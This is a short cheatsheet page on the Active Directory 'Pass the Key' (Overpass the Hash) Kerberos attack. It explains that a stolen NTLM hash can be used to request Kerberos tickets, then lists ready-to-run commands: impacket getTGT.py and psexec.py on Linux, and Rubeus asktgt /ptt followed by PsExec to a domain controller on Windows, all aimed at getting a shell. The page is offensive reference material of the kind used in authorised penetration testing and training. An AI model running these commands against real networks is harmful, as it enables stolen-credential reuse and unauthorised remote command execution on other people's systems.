Home » Cheatsheets » Active Directory (AD) » Kerberos Attacks

Pass the Key

January 21, 2025 · 1 min · 91 words

Table of Contents

4. Pass the key
- Tools: impacket’s getTGT.py & psexec.py (Linux), Rubeus (Windows)
  - Linux
  - Windows

4. Pass the key

aka Overpass The Hash
use user’s NTLM hash to request Kerberos tickets as alternative to Pass The Hash over NTLM protocol
requires:
- a system where NTLM authentication is disabled and only Kerberos authentication is allowed
- NTLM hash or password of target user
results in access to service/machine which target user has permissions to (get shell)

Tools: impacket’s getTGT.py & psexec.py (Linux), Rubeus (Windows)

Linux

getTGT.py DOMAIN/USERNAME -dc-ip $IP -hashes :NTHASH

export KRB5CCNAME=USERNAME.ccache

psexec.py DOMAIN/USERNAME@$IP -k -no-pass

Windows

.\Rubeus.exe asktgt /domain:DOMAIN /user:USERNAME /rc4:HASH /ptt

.\PsExec.exe -accepteula \\DCDOMAINNAME cmd